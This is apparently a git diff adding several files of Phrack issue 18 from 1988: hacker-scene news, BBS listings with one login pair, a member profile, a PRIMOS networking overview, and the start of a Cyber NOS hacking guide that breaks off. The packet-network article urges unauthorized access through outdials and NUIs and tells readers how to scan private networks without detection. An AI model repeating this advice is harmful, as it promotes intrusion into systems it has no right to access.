+group's founder, to re-form the organization.  Although the group hasn't
+publicly announced their existence or written any files, we should be hearing
+from them in the near future.
+
+The Current Members of TOK Include -
+
+         Control C
+         Prime Suspect
+         Jack Death
+         The UrVile
+         The Prophet
+         Psychic Warlord
+
+             Information Provided By Control C, and Prime Suspect.
+______________________________________________________________________________
+
+Phrack Inc. Support Boards
+==========================
+
+Phrack Inc. has always made it a habit to set up Phrack Inc. sponsor accounts
+on the more popular boards around.  These sponsor accounts are set up, so that
+the users may get in touch with the Phrack Magazine staff if they would like
+to contribute an article, or any other information to our publication.  Please
+take note of the boards on which Phrack Inc. accounts are set up.  Thank you.
+
+The Current List of Phrack Inc. Sponsor Boards Includes -
+
+         P-80 Systems        - 304/744-2253
+         OSUNY               - 914/725-4060
+         The Central Office  - 914/234-3260
+         Digital Logic's DS  - 305/395-6906
+         The Forgotten Realm - 618/943-2399 *
+
+         * - Phrack Headquarters
+______________________________________________________________________________
+
+SummerCon '88 Preliminary Planning
+==================================
+
+Planning for SummerCon '88 is underway.  So far, we have decided on four
+tentative locations:  New York City, Saint Louis, Atlanta, or Florida.  Since
+this is only tentative, no dates have been set or reservations made for a
+conference.
+
+If you have any comments, suggestions, etc, please let us know.  If you are
+planning to attend SummerCon '88, please let us know as well.  Thank you.
+
+                 Information Provided By The Forgotten Realm.
+______________________________________________________________________________
+
+LOD/H Technical Journal
+=======================
+
+Lex Luthor of LOD/H (Legion of Doom/Hackers) has been busy with school, etc.,
+so he has not had the time, nor the initiative to release the next issue of
+the LOD/H Technical Journal.  On this note, he has tentatively turned the
+Journal over to Phantom Phreaker, who will probably be taking all
+contributions for the Journal.  No additional information is available.
+
+           Information Provided By The UrVile and Phantom Phreaker.
+______________________________________________________________________________
+
+Congress To Restrict 976/900 Dial-A-Porn Services
+=================================================
+
+Congress is considering proposals to restrict dial-up services in an effort to
+make it difficult for minors to access sexually explicit messages.  A
+House-Senate committee is currently negotiating the "dial-a-porn" proposal.
+Lawmakers disagree whether or not the proposal is constitutional and are
+debating the issue of requiring phone companies to offer a service that would
+allow parents, free of charge, to block the 976/900 services.  Other proposals
+would require customers to pay in advance or use credit cards to access the
+976/900 services.
+
+Some companies are currently offering free services that restrict minors from
+accessing sexually explicit messages.  AT&T and Department of Justice
+officials are cooperating in a nationwide crackdown of "dial-a-porn" telephone
+companies.  The FCC recently brought charges against one of AT&T's largest 900
+Service customers, and AT&T provided the confidential information necessary in
+the prosecution.  AT&T also agreed to suspend or disconnect services of
+companies violating the commission ban by transmitting obscene or indecent
+messages to minors.
+______________________________________________________________________________
+
+Some Hope Left For Victims Of FGD
+=================================
+
+US Sprint's famed FGD (Feature Group D) dial-ups and 800 INWATS exchanges may
+pose no threat to individuals under switches that do not yet offer equal
+access service to alternate long distance carriers.  Due to the way Feature
+Group D routes its information, the ten-digit originating number of the caller
+is not provided when the call is placed from a non-equal access area.  The
+following was taken from an explanation of US Sprint's 800 INWATS Service.
+
+        *************************************************************
+
+                                 CALL DETAIL
+
+        *************************************************************
+
+With US Sprint 800 Service, a customer will receive call detail information
+for every call on every invoice.  The call detail for each call includes:
+
+         o  Date of call
+         o  Time of call
+         o  The originating city and state
+         o  The ten-digit number of the caller if the call originates in an
+            equal access area or the NPA of the caller if the non-equal access
+            area.
+         o  Band into which the call falls
+         o  Duration of the call in minutes
+         o  Cost of the call
+
+This came directly from US Sprint.  Do as you choose, but don't depend on
+this.
+
+                      Information Provided by US Sprint.
+______________________________________________________________________________
+
+Telenet Bolsters Network With Encryption
+========================================
+
+Telenet Communications Corporation strengthened its public data network
+recently with the introduction of data encryption capability.
+
+The X.25 Encryption Service provides a type of data security previously
+unavailable on any public data network, according to analysts.  For Telenet,
+the purpose of the offering is "to be more competitive; nobody else does
+this," according to Belden Menkus, an independent network security consultant
+based in Middleville, NJ.
+
+The service is aimed at users transmitting proprietary information between
+host computers, such as insurance or fund-transfer applications.  It is priced
+at $200 per month per host computer connection.  Both the confidentiality and
+integrity of the data can be protected via encryption.
+
+The scheme provides end-to-end data encryption, an alternative method whereby
+data is decrypted and recrypted at each node in the network.  "This is a
+recognition that end-to-end encryption is really preferable to link
+encryption," Menkus said.
+
+The service is available over both dial-up and leased lines, and it supports
+both synchronous and asynchronous traffic at speeds up to 9.6K BPS.
+
+Telenet has approved one particular data encryption device for use with the
+service, The Cipher X 5000, from Technical Communications Corporation (TCC), a
+Concord, Massachusetts based vendor.  TCC "has been around the data encryption
+business for quite a while," Menkus said.
+
+The Cipher X implements the National Bureau of Standards' Data Encryption
+Standard (DES).  DES is an algorithm manipulated by a secret 56 bit key.
+Computers protected with the device can only be accessed by users with a
+matching key.
+
+The data encryptor is installed at user sites between the host computer and
+the PAD (Packet Assembler/Disassembler).
+
+Installation of the TCC device does not affect the user's ability to send
+non-encrypted data, according to Telenet.  By maintaining a table of network
+addresses that require encryption, the device decides whether or not to
+encrypt each transmission.
+
+                    Information Provided by Network World.
+______________________________________________________________________________
+==============================================================================
diff --git a/phrack18/11.txt b/phrack18/11.txt
new file mode 100644
index 0000000..62a5f30
--- /dev/null
+++ b/phrack18/11.txt
@@ -0,0 +1,106 @@
+                               ==Phrack Inc.==
+
+                    Volume Two, Issue 18, Phile #11 of 11
+
+             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+             PWN                                             PWN
+             PWN      >>>>>=-* Phrack World News *-=<<<<<    PWN
+             PWN                Issue XVIII/2                PWN
+             PWN                                             PWN
+             PWN          Created By Knight Lightning        PWN
+             PWN                                             PWN
+             PWN             Compiled and Written            PWN
+             PWN                  by Epsilon                 PWN
+             PWN                                             PWN
+             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+Intro
+=====
+
+It seems that there is yet some things to be covered.  In addendum, we will be
+featuring, as a part of PWN, a special section where up-and-coming H/P
+Bulletin Boards can be advertised.  This will let everyone know where the
+board scene stands.  If you have a board that you feel has potential, but
+doesn't have good users, let us know.  Thanks.
+______________________________________________________________________________
+
+Doctor Cypher Busted?
+=====================
+
+Doctor Cypher, who frequents the Altos Chat, The Dallas Hack Shack, Digital
+Logic's Data Service, The Forgotten Realm, P-80 Systems, and others, is
+believed to have had his modem confiscated by "Telephone Company Security,"
+and by his local Sheriff.  No charges have been filed as of this date.  He
+says he will be using a friend's equipment to stay in touch with the world.
+
+                  Information Provided by Hatchet Molly
+______________________________________________________________________________
+
+Give These Boards A Call
+========================
+
+These systems have potential, but need good users, so give them a call, and
+help the world out.
+
+         The Autobahn -                The Outlet Private -
+
+         703/629-4422                  313/261-6141
+         Primary - 'central'           newuser/kenwood
+         Sysop - The Highwayman        Sysop - Ax Murderer
+         Hack/Phreak                   Private Hack/Phreak
+
+         Dallas Hack Shack -           The Forgotten Realm -
+
+         214/422-4307                  618/943-2399
+         Apply For Access              Apply For Access
+         Sysop - David Lightman        Sysop - Crimson Death
+         Private Hack/Phreak           Private H/P & Phrack Headquarters
+______________________________________________________________________________
+
+AllNet Hacking Is Getting Expensive
+===================================
+
+For those of you who hack AllNet Long Distance Service, watch out.  AllNet
+Communications Corp. has announced that they will be charging $500.00 PER
+ATTEMPT to hack their service.  That's not PER VALID CODE, that's PER ATTEMPT.
+Sources say that The Fugitive (619) received a $200,000.00 phone bill from
+AllNet.
+
+This may set examples for other long distance communication carriers in the
+future, so be careful what you do.
+______________________________________________________________________________
+
+Editorial - What Is The Best Way To Educate New Hackers?
+========================================================
+
+Since the "demise" of Phreak Klass 2600 and PLP, the H/P world has not seen a
+board dedicated to the education of new hackers.  Although PK2600 is still up
+(806/799-0016, educate) many of the old "teachers" never call.  The board has
+fallen mainly to new hackers who are looking for teachers.  This may pose a
+problem.  If boards aren't the way to educate these people (I think they are
+the best way, in fact), then what is?  Certainly not giant Alliance
+conferences as in the past, due to recent "black-listing" of many "conferees"
+who participated heavily in Alliance Teleconferencing in the past.
+
+I think it might be successful if someone was able to set up another board
+dedicated to teaching new hackers.  A board which is not private, but does
+voice validate the users as they login.  Please leave some feedback as to what
+you think of this idea, or if you are willing to set this type of system up.
+Thanks.
+______________________________________________________________________________
+
+US Sprint Employee Scam
+=======================
+
+The US Sprint Security Department is currently warning employees of a scam
+which could be affecting them.  An unidentified man has been calling various
+employees throughout the US Sprint system and telling them that if they give
+him their FON Card numbers, they will receive an additional US Sprint employee
+long-distance credit.  The Security Department says, "this is a 100 percent
+scam."  "If you're called to take part in this operation, please call the
+Security Department at (816)822-6217."
+
+                      Information Provided By US Sprint
+______________________________________________________________________________
+
diff --git a/phrack18/2.txt b/phrack18/2.txt
new file mode 100644
index 0000000..6ad69e3
--- /dev/null
+++ b/phrack18/2.txt
@@ -0,0 +1,94 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 18, Phile #2 of 11
+
+                           ==Phrack Pro-Phile XI==
+
+                     Written and Created by Crimson Death
+
+    Welcome to Phrack Pro-Phile XI.  Phrack Pro-Phile is created to bring info
+to you, the users, about old or highly important/controversial people.  This
+month, I bring to you a name familiar to most in the BBS world...
+
+                                  Ax Murderer
+                                  ===========
+
+Ax Murderer is popular to many of stronger names in the P/H community.
+------------------------------------------------------------------------------
+Personal
+========
+             Handle:  Ax Murderer
+           Call him:  Mike
+       Past handles:  None
+      Handle origin:  Thought of it while on CompuServe.
+      Date of Birth:  10/04/72
+Age at current date:  15
+             Height:  6' 2''
+             Weight:  205 Lbs.
+          Eye color:  Brown
+         Hair Color:  Brown
+          Computers:  IBM PC, Apple II+, Apple IIe
+  Sysop/Co-Sysop of:  The Outlet Private, Red-Sector-A, The Autobahn
+
+------------------------------------------------------------------------------
+    Ax Murderer started phreaking and hacking in 1983 through the help of some
+of his friends.  Members of the Hack/Phreak world which he has met include
+Control C, Bad Subscript, The Timelord.  Some of the memorable phreak/hack
+BBS's he was/is on included WOPR, OSUNY, Plovernet, Pirate 80, Shadow Spawn,
+Metal Shop Private, Sherwood Forest (213), IROC, Dragon Fire, and Shadowland.
+His phreaking and hacking knowledge came about with a group of people in which
+some included Forest Ranger and The Timelord.
+
+    Ax Murderer is a little more interested in Phreaking than hacking.  He
+does like to program however, he can program in 'C', Basic, Pascal, and
+Machine Language.
+
+    The only group in which Ax Murderer has been in is Phoneline Phantoms.
+------------------------------------------------------------------------------
+
+        Interests:  Telecommunications (Modeming, phreaking, hacking,
+                    programming), football, track, cars, and music.
+
+Ax Murderer's Favorite Thing
+----------------------------
+
+  His car... (A Buick Grand National)
+  His gilrfriend... (Sue)
+  Rock Music
+
+Most Memorable Experiences
+--------------------------
+
+  Newsweek Incident with Richard Sandza (He was the Judge for the tele-trial)
+
+Some People to Mention
+----------------------
+
+Forest Ranger (For introducing me to everyone and getting me on Dragon Fire)
+Taran King (For giving me a chance on MSP and the P/H world)
+Mind Bender (For having ANY utilities I ever needed)
+The Necromancer (Getting me my Apple'cat)
+The Titan (Helping me program the BBS)
+
+All for being friends and all around good people and phreaks.
+------------------------------------------------------------------------------
+
+    Ax Murderer is out and out against the idea of the destruction of data.
+He hated the incident with MIT where the hackers were just hacking it to
+destroy files on the system.  He says that it ruins it for the everyone else
+and gives 'True Hackers' a bad name.  He hates it when people hack to destroy,
+Ax has no respect for anyone who does this today.  Where have all the good
+times gone?
+
+------------------------------------------------------------------------------
+
+I hope you enjoyed this phile, look forward to more Phrack Pro-Philes coming
+in the near future....  And now for the regularly taken poll from all
+interviewees.
+
+Of the general population of phreaks you have met, would you consider most
+phreaks, if any, to be computer geeks? "No, not really."  Thanks Mike.
+
+                                          Crimson Death
+                                   Sysop of The Forgotten Realm
+==============================================================================
diff --git a/phrack18/3.txt b/phrack18/3.txt
new file mode 100644
index 0000000..b72370f
--- /dev/null
+++ b/phrack18/3.txt
@@ -0,0 +1,214 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 18, Phile #3 of 11
+
+         _ _ _ _ _____________________________________________ _ _ _ _
+         _-_-_-_-                                             -_-_-_-_
+         _-_-_-_-             An Introduction To              -_-_-_-_
+         _-_-_-_-                                             -_-_-_-_
+         _-_-_-_-          Packet Switched Networks           -_-_-_-_
+         _-_-_-_-                                             -_-_-_-_
+         _-_-_-_-                                             -_-_-_-_
+         _-_-_-_-                                             -_-_-_-_
+         _-_-_-_-  Written By -                   Revised -   -_-_-_-_
+         _-_-_-_-                                             -_-_-_-_
+         _-_-_-_-  Epsilon                        05/3/88     -_-_-_-_
+         _-_-_-_-_____________________________________________-_-_-_-_
+
+
+Preface -
+
+   In the past few years, Packet Switched Networks have become a prominent
+feature in the world of telecommunications.  These networks have provided ways
+of communicating with virtually error-free data, over very large distances.
+These networks have become an imperative to many a corporation in the business
+world.  In this file we will review some of the basic aspects of Packet
+Switched Networks.
+
+Advantages -
+
+   The Packet Switched Network has many advantages to the common user, and
+even more to the hacker, which will be reviewed in the next topic.
+
+   The basis of a Packet Switched Network is the Packet Switch.  This network
+enables the service user to connect to any number of hosts via a local POTS
+dial-up/port. The various hosts pay to be connected to this type of network,
+and that's why there is often a surcharge for connection to larger public
+services like Compuserve or The Source.
+
+   A Packet Switched Network provides efficient data transfer and lower rates
+than normal circuit switched calls, which can be a great convenience if you
+are planning to do a lot of transferring of files between you and the host.
+
+   Not only is the communication efficient, it is virtually error free.
+Whereas in normal circuit switched calls, there could be a drastic increase in
+errors, thus creating a bad transfer of data.
+
+   When using a Packet Switched Network, it is not important that you
+communicate at the same baud rate as your host.  A special device regulates
+the speed so that the individual packets are sped up or slowed down, according
+to your equipment.  Such a device is called a PAD (Packet Assembler
+Disassembler).
+
+   A PSN also provides access to a variety of information and news retrieval
+services.  The user pays nothing for these calls, because the connections  are
+collect. Although the user may have to subscribe to the service to take
+advantage of it's services, the connection is usually free, except for a
+surcharge on some of the larger subscription services.
+
+Advantages To Hackers -
+
+   Packet Switched Networks, to me, are the best thing to come along since the
+phone system.  I'm sure many other hackers feel the same way.  One of the
+reasons for this opinion is that when hacking a system, you need not dial out
+of your LATA, using codes or otherwise.
+
+   Now, the hacker no longer has to figure out what parameters he has to set
+his equipment to, to communicate with a target computer effectively.  All
+PSSes use the same protocol, set by international standards.  This protocol is
+called X.25.  This protocol is used on every network-to-network call in the
+world.
+
+   When operating on a packet switch, you are not only limited to your own
+network (As if that wasn't enough already).  You can access other PSSes or
+private data networks through gateways which are implemented in your PSN.
+There are gateways to virtually every network, from virtually every other
+network, except for extremely sensitive or private networks, in which case
+would probably be completely isolated from remote access.
+
+   Another advantage with PSNs is that almost everyone has a local port, which
+means if you have an outdial (Next paragraph), you can access regular circuit
+switched hosts via your local Packet Switched Network port.  Since the ports
+are local, you can spend as much time as you want on it for absolutely no
+cost.  So think about it.  Access to any feasible network, including overseas
+PSNs and packet switches, access to almost any host, access to normal circuit
+switched telephone-reachable hosts via an outdial, and with an NUI (Network
+User Identity - Login and password entered at the @ prompt on Telenet),
+unlimited access to any NUA, reverse-charged or not.
+
+   Due to the recent abuse of long distance companies, the use of codes when
+making free calls is getting to be more and more  hazardous.  You may ask, 'Is
+there any resort to making free calls without using codes, and without using a
+blue  box?'  The answer is yes, but only when using data.  With an outdial,
+accessible from your local PSN port, you can make data calls with a remote
+modem, almost always connected directly to a server, or a port selector. This
+method of communicating is more efficient, safer, and more reliable than using
+any code.  Besides, with the implementation of equal access,  and the
+elimination of 950 ports, what choice will you have?
+
+Some Important Networks -
+
+   As aforementioned, PSNs are not only used in the United States.  They are
+all over the place.  In Europe, Asia, Canada, Africa, etc.  This is a small
+summary of some of the more popular PSNs around the world.
+
+         Country          Network Name          *DNIC
+         ~~~~~~~          ~~~~~~~ ~~~~           ~~~~
+         Germany          Datex-P                2624
+         Canada           Datapac                3020
+         Italy            Datex-P                0222
+         South Africa     Saponet                0655
+         Japan            Venus-P                4408
+         England          Janet/PSS              2342
+         USA              Tymnet                 3106
+         USA              Telenet                3110
+         USA              Autonet                3126
+         USA              RCA                    3113
+         Australia        Austpac                0505
+         Ireland          Irepac                 2724
+         Luxembourg       Luxpac                 2704
+         Singapore        Telepac                5252
+         France           Transpac               2080
+         Switzerland      Telepac                2284
+         Sweden           Telepac                2405
+         Israel           Isranet                4251
+         ~~~~~~~~~        ~~~~~~~                ~~~~
+         * - DNIC (Data Network Identification Code)
+             Precede DNIC and logical address with a
+             '0' when using Telenet.
+______________________________________________________________________________
+
+Notes On Above Networks -
+
+   Some countries may have more than one Packet Switching Network.  The ones
+listed are the more significant networks for each country.  For example, the
+United States has eleven public Packet Switching Networks, but the four I
+listed are the major ones.
+
+   Several countries may also share one network, as shown above.  Each country
+will have equal access to the network using the basic POTS dial-up ports.
+
+Focus On Telenet -
+
+   Since Telenet is one of the most famous, and highly used PSNs in the United
+States, I thought that informing you of some of the more interesting aspects
+of this network would be beneficial.
+
+Interconnections With Other Network Types -
+
+   Packet Switched Networks are not the only type of networks which connect a
+large capacity of hosts together.  There are also Wide Area Networks, which
+operate on a continuous link basis, rather than a packet switched basis.
+These networks do not use the standardized X.25 protocol, and can only be
+reached by direct dial-ups, or by connecting to a host which has network
+access permissions.  The point is, that if you wanted to reach, say, Arpanet
+from Telenet, you would have to have access to a host which is connected to
+both networks.  This way, you can connect to the target host computer via
+Telenet, and use the WAN via the target host.
+
+   WANs aren't the only other networks you can access.  Also, connections to
+other small, private, interoffice LANs are quite common and quite feasible.
+
+Connections To International NUAs via NUIs -
+
+   When using an NUI, at the prompt, type 0+DNIC+NUA.  After your connection
+is established, proceed to use the system you've reached.
+
+Private Data Networks -
+
+   Within the large Packet Switched Networks that are accessible to us there
+are also smaller private networks.  These networks can sometimes be very
+interesting as they may contain many different systems.  A way to identify a
+private network is by looking at the three digit prefix.  Most prefixes
+accessible by Telenet are based on area codes.  Private networks often have a
+prefix that has nothing to do with any area code. (Ex. 322, 421, 224, 144)
+Those prefixes are not real networks, just examples.
+
+   Inside these private networks, there are often  smaller networks which are
+connected with some type of host selector or gateway server.  If you find
+something like this, there may be hosts that can be accessed only by this port
+selector/server, and not by the normal prefix.  It is best to find out what
+these other addresses translate to, in case you are not able to access the
+server for some reason.  That way, you always have a backup method of reaching
+the target system (Usually the addresses that are accessed by a gateway
+server/port selector translate to normal NUAs accessible from your Telenet
+port).
+
+   When exploring a private network, keep in mind that since these networks
+are smaller, they would most likely be watched more closely during business
+hours then say Telenet or Tymnet.  Try to keep your scanning and tinkering
+down to a minimum on business hours to avoid any unnecessary trouble.
+Remember, things tend to last longer if you don't abuse the hell out of them.
+
+Summary -
+
+   I hope this file helped you out a bit, and at least gave you a general idea
+of what PSNs are used for, and some of the advantages of using these networks.
+If you can find something interesting during your explorations of PSNs, or
+Private Data Networks, share it, and spread the knowledge around.  Definitely
+exploit what you've found, and use it to your advantage, but don't abuse it.
+
+If you have any questions or comments, you reach me on -
+
+             The FreeWorld II/Central Office/Forgotten Realm/TOP.
+
+   I hope you enjoyed my file.  Thanks for your time.  I should be writing a
+follow up article to this one as soon as I can.  Stay safe..
+
+         - Epsilon
+______________________________________________________________________________
+
+                                - Thanks To -
+
+         Prime Suspect/Sir Qix/The Technic/Empty Promise/The Leftist
+______________________________________________________________________________
diff --git a/phrack18/4.txt b/phrack18/4.txt
new file mode 100644
index 0000000..6669f29
--- /dev/null
+++ b/phrack18/4.txt
@@ -0,0 +1,246 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 18, Phile #4 of 11
+
+   -------------------------------------------------------------------------
+   -                                                                       -
+   -                                                                       -
+   -           PRIMOS:                                                     -
+   -                       NETWORK  COMMUNICATIONS                         -
+   -                                                                       -
+   -                       PRIMENET, RJE, DPTX                             -
+   -                                                                       -
+   -                                                                       -
+   - Presented by Magic Hasan                                   June 1988  -
+   -------------------------------------------------------------------------
+
+
+   PRIME's uniform operating system, PRIMOS, supports a wide range of
+communications products to suit any distributed processing need.  The PRIMENET
+distributed networking facility provides complete local and remote network
+communication services for all PRIME systems.  PRIME's Remote Job Entry (RJE)
+products enable multi-user PRIME systems to emulate IBM, CDC, Univac,
+Honeywell and ICL remote job entry terminals over synchronous communication
+lines. PRIME's Distributed Processing Terminal Executive (DPTX) allows users
+to construct communication networks with PRIME and IBM-compatible equipment.
+
+                                   PRIMENET
+                                   --------
+
+   PRIMENET provides complete local and remote network communication services
+for all PRIME systems.  PRIMENET networking software lets a user or process on
+one PRIME system communicate with any other PRIME system in the network
+without concern for any protocol details.  A user can log in to any computer
+in the network from any terminal in the network.  With PRIMENET, networking
+software processes running concurrently on different systems can communicate
+interactively.  PRIMENET allows transparent access to any system in the
+network without burdening the user with extra commands.
+
+   PRIMENET has been designed and implemented so that user interface is simple
+and transparent.  Running on a remote system from a local node of the network
+or accessing remote files requires no reprogramming of user applications or
+extensive user training.  All the intricacies and communication protocols of
+the network are handled by the PRIMENET software.  For both the local and
+remote networks, PRIMENET will allow users to share documents, files, and
+programs and use any disk or printer configured in the network.
+
+   For a local network between physically adjacent systems, PRIME offers the
+high-performance microprocessor, the PRIMENET Node Controller (PNC).  The
+controller users direct memory access for low overhead and allows loosely
+coupled nodes to share resources in an efficient manner.  The PNCs for each
+system are connected to each other with a coaxial cable to form a high-speed
+ring network, with up to 750 feet (230 meters) between any two systems.
+
+   Any system in the PNC ring can establish virtual circuits with any other
+system, making PNC-based networks "fully connected" with a direct path between
+each pair of systems.  The ring has sufficient bandwidth (1 MB per second) and
+addressing capability to accommodate over 200 systems in a ring structure;
+however, PRIMENET currently supports up to sixteen systems on a ring to
+operate as a single local network.
+
+   The PRIMENET Node Controller is designed to assure continuity of operation
+in the event that one of the systems fails.  One system can be removed from
+the network or restored to on-line status without disturbing the operations of
+the other system.  An active node is unaware of messages destined for other
+nodes in the network, and the CPU is notified only when a message for that
+node has been correctly received.
+
+   Synchronous communications over dedicated leased lines or dial-up lines is
+provided through the Multiple Data Link Controller (MDLC).  This controller
+handles certain protocol formatting and data transfer functions normally
+performed by the operating system in other computers.  The controller's
+microprogrammed architecture increases throughput by eliminating many tasks
+from central processor overhead.
+
+   The communications controller also supports multiple protocols for
+packet-switched communications with Public Data Networks such as the United
+States' TELENET and TYMNET, the Canadian DATAPAC, Great Britain's
+International Packet Switching Service (IPSS), France's TRANSPAC, and the
+European Packet Switching Network, EURONET.  Most Public Data Networks require
+computers to use the CCITT X.25 protocol to deal with the management of
+virtual circuits between a system and others in the network.  The synchronous
+communications controller supports this protocol.  PRIME can provide the X.25
+protocol for use with the PRIMENET networking software without modification to
+the existing hardware configuration.
+
+   PRIMENET software offers three distinct sets of services.  The
+Inter-Program Communication Facility (IPCF) lets programs running under the
+PRIMOS operating system establish communications paths (Virtual circuits) to
+programs in the same or another PRIME system, or in other vendors' systems
+supporting the CCITT X.25 standard for packet switching networks.  The
+Interactive Terminal Support (ITS) facility permits terminals attached to a
+packet switching network, or to another PRIME system, to log-in to a PRIME
+system with the same capabilities they would have if they were directly
+attached to the system.  The File Access Manager (FAM) allows terminal users
+or programs running under the PRIMOS operating system to utilize files
+physically stored on other PRIME systems in a network.  Remote file operations
+are logically transparent to the application program.  This means no new
+applications and commands need  to be learned for network operation.
+
+   The IPCF facility allows programs in a PRIME computer to exchange data with
+programs in the same computer, another PRIME computer, or another vendor's
+computer, assuming that that vendor supports X.25.  This feature is the most
+flexible and powerful one that any network software package can provide.  It
+basically allows an applications programmer to split up a program, so that
+different pieces of the program execute on different machines a network.  Each
+program component can be located close to the resource (terminals, data,
+special peripherals, etc.) it must handle, decode the various pieces and
+exchange data as needed, using whatever message formats the application
+designer deems appropriate.  The programmer sees PRIMENET's IPCF as a series
+of pipes through which data can flow.  The mechanics of how the data flows are
+invisible; it just "happens" when the appropriate services are requested.  If
+the two programs happen to end up on the same machine, the IPCF mechanism
+still works.  The IPCF offers the following advantages:
+
+        1)  The User does not need to understand the detailed
+            mechanisms of communications software in order to
+            communicate.
+        2)  Calls are device-independent.  The same program will
+            work over physical links implemented by the local node
+            controller (local network), leased lines, or a packet
+            network.
+        3)  Programs on one system can concurrently communicate
+            with programs on other systems using a single
+            communications controller.  PRIMENET handles all
+            multiplexing of communications facilities.
+        4)  A single program can establish multiple virtual
+            circuits to other programs in the network.
+
+   PRIMENET's ITS facility allows an interactive terminal to have access to
+any machine in the network.  This means that terminals can be connected into
+an X.25 packet network along with PRIME computers.  Terminal traffic between
+two systems is multiplexed over the same physical facilities as inter-program
+data, so no additional hardware is needed to share terminals between systems.
+
+   This feature is ordinarily invisible to user programs, which cannot
+distinguish data entering via a packet network from data coming in over AMLC
+lines.  A variant of the IPCF facility allows users to include the terminal
+handling protocol code in their own virtual space, thus enabling them to
+control multiple terminals on the packet network within one program.
+Terminals entering PRIMOS in this fashion do not pass through the usual log-in
+facility, but are immediately connected to the application program they
+request. (The application program provides whatever security checking is
+required.)
+
+   The result is the most effective available means to provide multi-system
+access to a single terminal, with much lower costs for data communications and
+a network which is truly available to all users without the expense of
+building a complicated private network of multiplexors and concentrators.
+
+   By utilizing PRIMENET's File Access Manager (FAM), programs running under
+PRIMOS can access files on other PRIME systems using the same mechanisms used
+to access local files.  This feature allows users to move from a single-system
+environment to a multiple-system one without difficulty.  When a program and
+the files it uses are separated into two (or more) systems the File Access
+Management (FAM)is automatically called upon whenever the program attempts to
+use the file.  Remote file operations are logically  transparent to the user
+or program.
+
+   When a request to locate a file or directory cannot be satisfied locally,
+the File Access Manager is invoked to find the data elsewhere in the network.
+PRIMOS initiates a remote procedure call to the remote system and suspends the
+user.  This procedure call is received by an answering slave process on the
+remote system, which performs the requested operation and returns data via
+subroutine parameters.  The slave process on the remote system is dedicated to
+its calling master process (user) on the local system until released.  A
+master process (user) can have a slave process on each of several remote
+systems simultaneously.  This means that each user has a dedicated connection
+for the duration of the remote access activity so many requests  can be
+handled in parallel.
+
+   FAM operation is independent of the specific network hardware connecting
+the nodes.  There is no need to rewrite programs or learn new commands when
+moving to the network environment.  Furthermore, the user need only be
+logged-in to one system in the network, regardless of the location of the
+file.  Files on the local system or remote systems can be accessed dynamically
+by file name within a program, using the language-specific open and close
+statements.  No external job control language statements are needed for the
+program to access files. Inter-host file transfers and editing can be
+performed using the same PRIMOS utilities within the local system by
+referencing the remote files with their actual file names.
+
+                                REMOTE JOB ENTRY
+                                ----------------
+
+   PRIME's Remote Job Entry (RJE) software enables a PRIME system to emulate
+IBM, CDC, Univac, Honeywell and ICL remote job entry terminals over
+synchronous communication lines.  PRIME's RJE provides the same communications
+and peripheral support as the RJE terminals they emulate, appearing to the
+host processor to be those terminals.  All PRIME  RJE products provide three
+unique benefits:
+
+        * PRIME RJE is designed to communicate with multiple
+          remote sites simultaneously.
+
+        * PRIME RJE enables any terminal connected to a PRIME system to
+          submit jobs for transmission to remote processors, eliminating the
+          requirement for dedicated terminals or RJE stations at each
+          location.
+
+        * PRIME's mainframe capabilities permit concurrent running of RJE
+          emulators, program development and production work.
+
+   PRIME's RJE supports half-duplex, point-to-point, synchronous
+communications and operates over dial-up and dedicated lines.  It is fully
+supported by the PRIMOS operating system.
+
+
+                 DISTRIBUTED PROCESSING TERMINAL EXECUTIVE (DPTX)
+                 ------------------------------------------------
+
+   PRIME's Distributed Processing Terminal Executive (DPTX) allows users to
+construct communication networks with PRIME and IBM-compatible equipment.
+DPTX conforms to IBM 3271/3277 Display System protocols, and can be integrated
+into networks containing IBM mainframes, terminals and printers without
+changing application code or access methods and operates under the PRIMOS
+operating system.
+
+   DPTX is compatible with all IBM 370 systems and a variety of access methods
+and teleprocessing monitors:  BTAM, TCAM, VTAM, IMS/VS, CIC/VS, and TSO.  They
+provide transmission speeds up to 9600 bps using IBM's Binary Synchronous
+Communications (BSC) protocol.
+
+   DPTX is comprised of three software modules that allow PRIME systems to
+emulate and support IBM or IBM compatible 3271/3277 Display Systems.  One
+module, Data Stream Compatibility (DPTX/DSC), allows the PRIME system to
+emulate the operation of a 3271 on the IBM system.  This enables both terminal
+user and application programs (interactive or batch) on the PRIME System to
+reach application programs on an IBM mainframe.  A second module, Terminal
+Support Facility (DPTX/TSF), allows a PRIME system to control a network of IBM
+3271/3277 devices.  This enables terminal users to reach application programs
+on a PRIME computer.  The third module, Transparent Connect Facility
+(DPTX/TCF), combines the functions of modules one and two with additional
+software allowing 3277 terminal users to to reach programs on a IBM mainframe,
+even though the terminal subsystem is physically connected to a PRIME system,
+which is connected to an IBM system.
+
+   PRIMOS offers a variety of different Communication applications.  Being
+able to utilize these applications to their fullest extent can make life easy
+for a Primos "enthusiast."  If you're a beginner with Primos, the best way to
+learn more, as with any other system, is to get some "hands-on" experience.
+Look forward to seeing some beginner PRIMOS files in the near future.  -MH
+------------------------------------------------------------------------------
+
+Special thanks to PRIME INC. for unwittingly providing the text for this
+article.
+===============================================================================
diff --git a/phrack18/5.txt b/phrack18/5.txt
new file mode 100644
index 0000000..c4cdbd8
--- /dev/null
+++ b/phrack18/5.txt
@@ -0,0 +1,356 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 18, Phile #5 of 11
+
+    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+   -=                                                                     =-
+   -=               Hacking Control Data Corporation's Cyber              =-
+   -=                                                                     =-
+   -=               Written by Phrozen Ghost, April 23, 1988              =-
+   -=                                                                     =-
+   -=                   Exclusively for Phrack Magazine                   =-
+   -=                                                                     =-
+    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+  This article will cover getting into and using NOS (Networking Operating
+System) version 2.5.2 running on a Cyber 730 computer.  Cybers generally run
+this operating system so I will just refer to this environ- ment as Cyber.
+Also, Cyber is a slow and outdated operating system that is primarily used
+only for college campuses for running compilers.  First off after you have
